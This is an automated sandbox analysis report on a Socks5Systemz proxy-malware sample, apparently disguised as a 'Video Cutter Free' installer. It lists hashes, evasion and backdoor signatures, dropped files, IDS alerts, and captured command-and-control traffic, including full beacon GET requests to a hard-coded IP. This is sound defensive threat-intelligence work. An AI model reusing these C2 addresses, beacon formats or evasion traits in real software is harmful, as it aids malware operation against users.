
Windows Analysis Report
imMQqf6YWk.exe

Overview

General Information

Sample name: imMQqf6YWk.exe (renamed because original name is a hash value)
Original sample name: c9019cfc066b4cf4439ab3fa00ae3ac9.exe
Analysis ID: 1572393
MD5: c9019cfc066b4cf4439ab3fa00ae3ac9
SHA1: 0ae7c04b0cbcc96bf8388062135bc0484981c3c2
SHA256: 798418d2b435a7feab725f614e2b77b3e311c9b859dec456edccc42af6982426
Tags: exe, user-abuse_ch

Detection

Socks5Systemz
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • imMQqf6YWk.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\imMQqf6YWk.exe" MD5: C9019CFC066B4CF4439AB3FA00AE3AC9)
    • imMQqf6YWk.tmp (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe" MD5: A0EB775B14D55062C7EB9F9226916FE8)
      • net.exe (PID: 1440 cmdline: "C:\Windows\system32\net.exe" pause video_cutter_free_12102 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 2520 cmdline: C:\Windows\system32\net1 pause video_cutter_free_12102 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • videocutterfree.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i MD5: F00EE01B4436F8DD28084F015B123ECC)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-E132I.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: videocutterfree.exe PID: 6460 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
5.0.videocutterfree.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T14:36:27.223217+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49933 | 188.119.66.185 | 443 | TCP
2024-12-10T14:36:32.934097+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49945 | 188.119.66.185 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T14:36:27.910797+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49933 | 188.119.66.185 | 443 | TCP
2024-12-10T14:36:33.620187+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49945 | 188.119.66.185 | 443 | TCP

AV Detection

Source: imMQqf6YWk.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045CFD8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045CFD8
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045D08C ArcFourCrypt,1_2_0045D08C
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045D0A4 ArcFourCrypt,1_2_0045D0A4
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Unpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack
Source: imMQqf6YWk.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Cutter Free_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.5:49933 version: TLS 1.2
Source: Binary string: msvcp71.pdbx# source: is-LDIKA.tmp.1.dr
Source: Binary string: msvcr71.pdb< source: is-2IP8E.tmp.1.dr
Source: Binary string: msvcp71.pdb source: is-LDIKA.tmp.1.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-IBF1C.tmp.1.dr
Source: Binary string: msvcr71.pdb source: is-2IP8E.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00474DFC FindFirstFileA,FindNextFileA,FindClose,1_2_00474DFC
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004625C4 FindFirstFileA,FindNextFileA,FindClose,1_2_004625C4
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00463B50 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B50
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00497C14 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497C14
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00463FCC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463FCC
Source: global traffic | TCP traffic: 192.168.2.5:49939 -> 31.214.157.206:2024
Source: Joe Sandbox View | IP Address: 31.214.157.206 31.214.157.206
Source: Joe Sandbox View | IP Address: 188.119.66.185 188.119.66.185
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49945 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49933 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49945 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49933 -> 188.119.66.185:443
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00992B95 WSASetLastError,WSARecv,WSASetLastError,select,5_2_00992B95
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 188.119.66.185
Source: imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/8
Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000C08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b325
Source: videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4
Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
Source: imMQqf6YWk.exe, 00000000.00000002.3874000805.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011773117.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011705088.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874072222.0000000000832000.00000004.00000020.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2013945725.0000000003230000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874349520.0000000002358000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2014010509.0000000002358000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
Source: unknown | Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.5:49933 version: TLS 1.2
Source: is-IBF1C.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_558705a6-5
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004785E0 NtdllDefWindowProc_A,1_2_004785E0
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004573E0 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573E0
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004804DB
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0047051C
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00467218
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004352C8
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0043DD50
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0043035C
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004444C8
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004345C4
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004866B4
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00444A70
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00430EE8
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045EF38
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045AFC4
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00445168
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00469278
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00445574
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00487614
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0048D9F0
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004519BC
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00401051
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00401C26
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609660FA
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6092114F
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6091F2C9
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096923E
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6093323D
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095C314
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60950312
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094D33B
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6093B368
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096748C
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6093F42E
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60954470
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609615FA
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096A5EE
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096D6A4
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609606A8
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60932654
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60955665
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094B7DB
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6092F74D
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60964807
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094E9BC
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60937929
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6093FAD6
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096DAE8
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094DA3A
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60936B27
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60954CF6
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60950C6B
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60966DF1
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60963D35
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60909E9C
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60951E86
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60912E0B
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60954FF8
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_0099605A
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A72B2
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A9AAA
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009B4210
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009ACB09
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009B3C99
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A8CF4
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009AD415
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009B1C24
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_0099DE29
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009ACFFD
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009E15E6
Source: Joe Sandbox View | Dropped File: C:\ProgramData\DVCMediaPlugin\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: String function: 009A7950 appears 37 times
Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: String function: 009B41A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00408C0C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00406AC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 0040595C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00445DD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 004344DC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 004078F4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00457D6C appears 73 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00403684 appears 224 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00457B60 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 00453344 appears 94 times
Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: String function: 004460A4 appears 59 times
Source: imMQqf6YWk.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: imMQqf6YWk.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: imMQqf6YWk.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: imMQqf6YWk.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-LRS1N.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-LRS1N.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-LRS1N.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
